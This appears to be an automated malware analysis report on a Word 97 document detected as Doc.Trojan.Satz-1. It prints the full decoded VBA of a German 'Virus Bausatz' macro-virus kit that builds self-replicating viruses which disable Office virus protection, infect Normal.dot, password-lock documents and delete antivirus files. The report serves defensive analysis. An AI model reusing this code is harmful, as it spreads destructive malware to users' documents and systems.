Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2c7249330104c79e…

MALICIOUS

Office (OLE)

262.0 KB Created: 2001-03-25 10:05:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 1eda9b83aca304e6eacc6dd1474ddff2 SHA-1: 443f903404534cdb8766955cb7799a4323bcd194 SHA-256: 2c7249330104c79ee2ff4a915227b2ac5285a3142651dac9f2bd9c7cad452f12
208 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Word document containing a legacy WordBasic auto-exec macro named 'autoopen'. The VBA code within 'macros.bas' also defines an 'autoopen' subroutine that attempts to minimize the application and show a userform named 'prog'. The script also contains obfuscated code that appears to be part of a macro virus kit, attempting to disable security features and potentially download additional content. The presence of the 'autoopen' macro and the nature of the VBA code strongly suggest a malicious intent to execute further stages.

Heuristics 5

  • ClamAV: Doc.Trojan.Satz-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Satz-1
  • NOP sled detected high SC_NOP_SLED
    Found 20+ consecutive 0x90 bytes
    Disassembly
    Attempted x86 opcode disassembly
    00029405  90                nop
    00029406  90                nop
    00029407  90                nop
    00029408  90                nop
    00029409  90                nop
    0002940A  90                nop
    0002940B  90                nop
    0002940C  90                nop
    0002940D  90                nop
    0002940E  90                nop
    0002940F  90                nop
    00029410  90                nop
    00029411  90                nop
    00029412  90                nop
    00029413  90                nop
    00029414  90                nop
    00029415  90                nop
    00029416  90                nop
    00029417  90                nop
    00029418  90                nop
    00029419  90                nop
    0002941A  90                nop
    0002941B  90                nop
    0002941C  90                nop
    0002941D  90                nop
    0002941E  90                nop
    0002941F  90                nop
    00029420  9f                lahf
    00029421  9f                lahf
    00029422  9f                lahf
    00029423  9f                lahf
    00029424  9f                lahf
    00029425  9f                lahf
    00029426  a0a0a0a0a0        mov al, byte ptr [0xa0a0a0a0]
    0002942B  a0a0a0a0a0        mov al, byte ptr [0xa0a0a0a0]
    00029430  a0a0afafaf        mov al, byte ptr [0xafafafa0]
    00029435  af                scasd eax, dword ptr es:[edi]
    00029436  af                scasd eax, dword ptr es:[edi]
    00029437  af                scasd eax, dword ptr es:[edi]
    00029438  b0b0              mov al, 0xb0
    0002943A  b0af              mov al, 0xaf
    0002943C  af                scasd eax, dword ptr es:[edi]
    0002943D  af                scasd eax, dword ptr es:[edi]
    0002943E  9f                lahf
    0002943F  9f                lahf
    00029440  9f                lahf
    00029441  af                scasd eax, dword ptr es:[edi]
    00029442  af                scasd eax, dword ptr es:[edi]
    00029443  af                scasd eax, dword ptr es:[edi]
    00029444  9f                lahf
    00029445  9f                lahf
    00029446  9f                lahf
    00029447  90                nop
    00029448  90                nop
    00029449  90                nop
    0002944A  7f7f              jg 0x294cb
    0002944C  7fcf              jg 0x2941d
    0002944E  cf                iretd
    0002944F  cf                iretd
    00029450  df                .byte 0xdf
    00029451  df                .byte 0xdf
    00029452  dfe0              fnstsw ax
    00029454  ef                out dx, eax
    00029455  ef                out dx, eax
    00029456  ef                out dx, eax
    00029457  f0                .byte 0xf0
    00029458  f0                .byte 0xf0
    00029459  f0                .byte 0xf0
    0002945A  ff                .byte 0xff
    0002945B  ff                .byte 0xff
    0002945C  ef                out dx, eax
    0002945D  ef                out dx, eax
    0002945E  ef                out dx, eax
    0002945F  ff                .byte 0xff
    00029460  ff                .byte 0xff
    00029461  fff0              push eax
    00029463  f0                .byte 0xf0
    00029464  f0                .byte 0xf0
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "VirusBausatz"
    Sub autoopen()
    Application.WindowState = wdWindowStateMinimize

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6678 bytes
SHA-256: 9643f3bc74c4dcf8fb58f5bfbe6b40b19ce8ddb3d0fa62305d0ef37c53ca7e3c
Detection
ClamAV: Doc.Trojan.Satz-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Attribute VB_Name = "VirusBausatz"
Sub autoopen()
Application.WindowState = wdWindowStateMinimize
prog.Show
End Sub

Attribute VB_Name = "prog"
Attribute VB_Base = "0{BA2AE9D2-2112-11D5-AEE1-DC167E47EF7A}{BA2AE9C3-2112-11D5-AEE1-DC167E47EF7A}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub boxzeigen_Click()

End Sub

Private Sub CheckBox3_Click()

End Sub

Private Sub CommandButton1_Click()
Hilfe.Show
End Sub

Private Sub create_Click()

Documents.Add

Set Target = ActiveDocument.VBProject.VBComponents(1).CodeModule

ende = "end if"
anzeichen = "'"
offnen = "sub autoopen()"
schliessen = "sub autoexit()"
speichern = "ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, fileformat:=wdFormatDocument"

vcode = "on error resume next" & Chr(10) _
& "'Made with the W97 MakroVirus Bausatz by MagBee" & Chr(10) & "ActiveDocument.ReadOnlyRecommended = False" & Chr(10) & "Options.VirusProtection = False" & Chr(10) _
& "Options.SaveNormalPrompt = False" & Chr(10) & "Application.DisplayAlerts = wdAlertsNone" & Chr(10) & "Application.EnableCancelKey = wdCancelDisabled" & Chr(10) _
& "Application.DisplayStatusBar = False" & Chr(10) & "Options.ConfirmConversions = False" & Chr(10) & "Application.ScreenUpdating = False" & Chr(10) & "If ThisDocument.Name =" & Chr$(34) & "Normal.dot" & Chr$(34) & "Then" & Chr(10) _
& "Set Source = NormalTemplate.VBProject.VBComponents(1).CodeModule" & Chr(10) _
& "Set Target = ActiveDocument.VBProject.VBComponents(1).CodeModule" & Chr(10) _
& "else" & Chr(10) & "Set Source = ActiveDocument.VBProject.VBComponents(1).CodeModule" & Chr(10) _
& Chr(10) & "Set Target = NormalTemplate.VBProject.VBComponents(1).CodeModule" & Chr(10) _
& "End If" & Chr(10) & "With Source" & Chr(10) & "vircode = .lines(1, .countoflines)" _
& Chr(10) & "End With" & Chr(10) & "With Target" & Chr(10) & ".deletelines 1, .countoflines" _
& Chr(10) & ".insertlines 1, vircode" & Chr(10) & "End With" & Chr(10) & Chr(10) & Chr(10) & Chr(10) _
& Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) _
& Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & "end sub" _


If OptionButton1.Value = True Then
With Target
    .insertlines 1, offnen
End With
End If

If OptionButton2.Value = True Then
With Target
    .insertlines 1, schliessen
End With
End If




With Target
    .insertlines 2, vcode
End With

With Target
    .insertlines 42, speichern
End With

If boxzeigen.Value = True Then

nachricht = InputBox("Gebt hier die Nachricht ein, die in der Messagebox stehen soll", "Nachricht in der Messagebox")
trigger = "if day(now()) = " & Label1 & " and month(now()) = " & Label3 & " then"
mbox = "Msgbox " & Chr$(34) & nachricht & Chr$(34) & ", ," & Chr$(34) & "W97M Virus Bausatz by MagBee" & Chr$(34)

If CheckBox3.Value = True Then
With Target
    .insertlines 31, mbox
End With
GoTo weiterpw
End If

With Target
    .insertlines 30, trigger
    .insertlines 31, mbox
    .insertlines 32, ende
End With


End If

weiterpw:
If passwort.Value = True Then

pawo = InputBox("Wie soll das Passwort lauten (keine Leerzeichen)", "Passwortvergabe")
triggerpw = "if day(now()) = " & Label4 & " and month(now()) = " & Label6 & " then"
pw = "If ActiveDocument.HasPassword = False Then ActiveDocument.Password = " & Chr$(34) & pawo & Chr$(34)

If CheckBox6.Value = True Then
With Target
    .insertlines 35, pw
End With
GoTo weiterers
End If

With Target
    .insertlines 34, triggerpw
    .insertlines 35, pw
    .insertlines 36, ende
End With
End If

weiterers:
If CheckBox2.Value = True Then

wzuersetz = InputBox("Welches Wort soll ersetzt werden", "Wort ersetzen")
ersetzwort = InputBox("Durch welches Wort soll es ersetzt werden", "Wort ersetzen")

ersetzen = "Selection.Find.ClearFormatting" & Chr(10) & "Selection.Find.Replacement.ClearFormatting" _
& Chr(10) & "With Selection.Find" & Chr(10) & ".Text = " & Chr$(34) & wzuersetz & Chr$(34) & Chr(10) & ".Replacement.Text = " _
& Chr$(34) & ersetzwort & Chr$(34) & Chr(10) & ".Forward = True" & Chr(10) & ".Wrap = wdFindContinue" & Chr(10) & "End With" _
& Chr(10) & "Selection.Find.Execute Replace:=wdReplaceAll"

triggerers = "if day(now()) = " & Label5 & " and month(now()) = " & Label9 & " then"

If CheckBox7.Value = True Then
With Target
    .insertlines 39, ersetzen
End With
GoTo weiter
End If

With Target
    .insertlines 38, triggerers
    .insertlines 39, ersetzen
    .insertlines 40, ende
End With
End If

weiter:

If OptionButton3.Value = True Then
killja = "Kill (" & Chr$(34) & "c:\Programme\Mcafee\VirusScan\*.*" & Chr$(34) & ")"
With Target
    .insertlines 28, killja
End With
End If

vname = InputBox("Wie soll der Virus heißen ?", "creation", "VirusName")
ActiveDocument.SaveAs FileName:=vname, FileFormat:=wdFormatDocument
 
MsgBox "Dein Virus wurde unter Eigene Dateien gespeichert", , "W97M Bausatz by MagBee" & Chr$(34)
 
End Sub

Private Sub payload_Click()

End Sub

Private Sub OptionButton1_Click()

End Sub

Private Sub OptionButton2_Click()
MsgBox "Wichtig bei Autoexit zuerst den Virus schließen (Aktives Fenster in Word)" & Chr(10) & "und dann Word beenden !", , "W97M Virus Bausatz by MagBee"
End Sub

Private Sub OptionButton4_Click()

End Sub

Private Sub passwort_Click()

End Sub

Private Sub ScrollBar1_Change()
Label1.Caption = ScrollBar1.Value
End Sub

Private Sub ScrollBar2_Change()
Label3.Caption = ScrollBar2.Value
End Sub

Private Sub ScrollBar3_Change()
Label4.Caption = ScrollBar3.Value
End Sub

Private Sub ScrollBar4_Change()
Label5.Caption = ScrollBar4.Value
End Sub

Private Sub ScrollBar5_Change()
Label6.Caption = ScrollBar5.Value
End Sub

Private Sub ScrollBar6_Change()
Label9.Caption = ScrollBar6.Value
End Sub

Private Sub UserForm_Click()

End Sub

Attribute VB_Name = "Hilfe"
Attribute VB_Base = "0{BA2AE9CE-2112-11D5-AEE1-DC167E47EF7A}{BA2AE9C5-2112-11D5-AEE1-DC167E47EF7A}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()

End Sub